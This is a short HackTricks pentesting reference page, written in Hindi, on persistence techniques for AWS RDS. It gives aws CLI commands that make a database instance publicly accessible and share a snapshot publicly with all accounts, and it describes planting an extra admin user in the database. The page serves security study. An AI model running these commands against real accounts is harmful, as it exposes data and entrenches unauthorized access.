AWS - RDS Persistence

HackTricks को समर्थन दें

RDS

अधिक जानकारी के लिए देखें:

AWS - Relational Database (RDS) Enum

इंस्टेंस को सार्वजनिक रूप से सुलभ बनाएं: rds:ModifyDBInstance

इस अनुमति के साथ एक हमलावर मौजूदा RDS इंस्टेंस को संशोधित कर सकता है ताकि सार्वजनिक पहुंच सक्षम हो सके

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB के अंदर एक एडमिन यूजर बनाएं

एक हमलावर बस DB के अंदर एक यूजर बना सकता है ताकि भले ही मास्टर यूजर का पासवर्ड बदल दिया जाए, वह डेटाबेस तक पहुंच नहीं खोता

स्नैपशॉट को सार्वजनिक करें

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
HackTricks को समर्थन दें

Last updated